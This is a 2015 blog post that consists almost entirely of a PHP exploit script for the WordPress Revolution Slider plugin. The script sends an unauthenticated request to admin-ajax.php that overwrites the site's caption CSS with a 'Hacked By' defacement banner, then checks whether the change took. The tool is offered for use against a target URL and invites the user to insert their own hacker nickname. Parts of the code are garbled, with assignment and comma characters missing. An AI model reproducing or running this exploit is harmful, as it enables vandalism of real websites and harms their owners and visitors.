-

Tuesday 26 May 2015

Wordpress Revolution Slider Exploit 2015

<?php

set_time_limit(0);
error_reporting(0);



print '

[*]==============================================================[*]

[+] Tool : Wordpress Revolution Slider Exploit 2015

[+] Coded By : s0w

[*] You Should Change The Hacker Nickname View => ( $indexName ) ..

[@] Used: php rev.php http://www.target.com

[*]==============================================================[*]

';


$site $argv[1];


/* your index name => */ $indexName '51N1CH1';


$karem = @file_get_contents("$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css");
$path "$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";



if (isset($argv[1])){

   

echo "Exploit & Scan Working !"."\n";



   
$post = array



(


"action" => "revslider_ajax_action",


"client_action" => "update_captions_css",


"data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked By $indexName<br><p style='color: transparent'>"


);


$ch curl_init ($site."/wp-admin/admin-ajax.php");
curl_setopt ($chCURLOPT_RETURNTRANSFER1);
curl_setopt ($chCURLOPT_FOLLOWLOCATION1);
curl_setopt ($chCURLOPT_USERAGENT"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($chCURLOPT_CONNECTTIMEOUT5);
curl_setopt ($chCURLOPT_SSL_VERIFYPEER0);
curl_setopt ($chCURLOPT_SSL_VERIFYHOST0);
curl_setopt ($chCURLOPT_POST1);
curl_setopt ($chCURLOPT_POSTFIELDS$post);
$data curl_exec ($ch);
curl_close ($ch);   

   

if (eregi("Hacked By",$karem)){

   

echo "\n"."\n";



echo "[+] Exploit Done [+]"."\n"$path;



echo "\n"."\n";

}else{

 

echo "[-] Exploit Failed ! [-]";

 

}   

   

}


// Finish Coded by s0w | Egyptian Shell Team //  


?>
 
 
 
 

Newer Post Older Post Home

1 comments:

This comment has been removed by a blog administrator.

Post a Comment